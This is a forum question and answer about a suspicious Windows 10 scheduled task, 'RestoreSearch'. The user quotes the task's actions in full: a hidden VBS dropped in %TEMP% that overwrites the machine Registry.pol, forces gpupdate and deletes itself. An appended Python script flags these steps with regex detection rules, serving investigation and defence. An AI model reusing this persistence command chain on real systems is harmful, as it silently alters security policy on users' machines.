Dmitry Stratsevsky, 2016-01-06 22:08:16

Windows 10 Scheduler has a weird "RestoreSearch" task that does something with security policy files. What exactly is going on here?

Windows 10 Home Edition. For some time now, I have been noticing a strange blinking of a window every few hours, as if a window opened and immediately closed. I started digging, and the search led me to the Task Scheduler, where I found this suspicious task:
Name: RestoreSearch
Description: Browser search setting
Actions:

cmd.exe /c @echo Set objShell = WScript.CreateObject("WScript.Shell") > %TEMP%\R.vbs
cmd.exe /c @echo objShell.Run "cmd.exe /c (attrib -H -R -S %WinDir%\system32\GroupPolicy\Machine\Registry.pol)&(copy/b/y %WinDir%\system32\GroupPolicy\Machine\R %WinDir%\system32\GroupPolicy\Machine\Registry.pol > nul)&(gpupdate/force)&(attrib +R %WinDir%\system32\GroupPolicy\Machine\Registry.pol)", 0, True >> %TEMP%\R.vbs
wscript.exe %TEMP%\R.vbs
cmd.exe /c del/Q %TEMP%\R.vbs

It runs every 3 hours.
There is nothing in %WinDir%\system32\GroupPolicy\, so probably nothing is being copied anywhere.
Just in case, I turned it off, but I would like to understand in more detail what it is.


1 answer(s)
Vasily, 2016-01-07
@Foolleren

>>>>> %TEMP%\R.vbs
Decent VBS programs do not keep scripts in temporary files; disable the task and clean the %TEMP% folder.
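
A defender-side triage of a task like this one, as an added example that is not part of the original question or answer: the Python below parses a Task Scheduler XML definition and flags the behaviours visible in the RestoreSearch actions. The rule names, function names and the minimal XML wrapper are assumptions made for the example; the four action strings are the ones quoted in the question.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Heuristics derived from the RestoreSearch actions quoted in the question.
# Rule names are made up for this example.
RULES = {
    "writes_script_to_temp": r'>>?\s*%TEMP%\\[^\s"]+\.(?:vbs|js|bat|cmd|ps1)\b',
    "runs_script_from_temp": r'^(?:wscript|cscript)(?:\.exe)?\s+%TEMP%\\',
    "overwrites_registry_pol": r'copy\S*\s.*GroupPolicy\\Machine\\Registry\.pol',
    "forces_policy_refresh": r'gpupdate\s*/force',
    "hidden_window_run": r'\.Run\s+".*",\s*0\s*,',
}

def task_actions(xml_text):
    """Return each <Exec> action of a task definition as 'command arguments'."""
    root = ET.fromstring(xml_text)
    return [
        f'{ex.findtext("t:Command", "", NS)} {ex.findtext("t:Arguments", "", NS)}'.strip()
        for ex in root.findall("t:Actions/t:Exec", NS)
    ]

def triage(xml_text):
    """Map each matching rule to the 1-based numbers of the actions that hit it."""
    hits = {}
    for number, line in enumerate(task_actions(xml_text), start=1):
        for rule, pattern in RULES.items():
            if re.search(pattern, line, re.IGNORECASE):
                hits.setdefault(rule, []).append(number)
    return hits

# Constructed sample: the four actions from the question in a minimal task XML wrapper.
PAGE_ACTIONS = [
    ("cmd.exe", r'/c @echo Set objShell = WScript.CreateObject("WScript.Shell") > %TEMP%\R.vbs'),
    ("cmd.exe", r'/c @echo objShell.Run "cmd.exe /c (attrib -H -R -S %WinDir%\system32\GroupPolicy\Machine\Registry.pol)&(copy/b/y %WinDir%\system32\GroupPolicy\Machine\R %WinDir%\system32\GroupPolicy\Machine\Registry.pol > nul)&(gpupdate/force)&(attrib +R %WinDir%\system32\GroupPolicy\Machine\Registry.pol)", 0, True >> %TEMP%\R.vbs'),
    ("wscript.exe", r"%TEMP%\R.vbs"),
    ("cmd.exe", r"/c del/Q %TEMP%\R.vbs"),
]
SAMPLE_XML = '<Task xmlns="%s"><Actions>%s</Actions></Task>' % (NS["t"], "".join(
    f"<Exec><Command>{escape(c)}</Command><Arguments>{escape(a)}</Arguments></Exec>"
    for c, a in PAGE_ACTIONS))

if __name__ == "__main__":
    for rule, actions in triage(SAMPLE_XML).items():
        print(f"{rule}: action(s) {actions}")
```

On the sample, every rule fires: actions 1 and 2 build the script in %TEMP%, action 2 carries the Registry.pol overwrite, the forced policy refresh and the hidden-window Run call, and action 3 executes the script.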
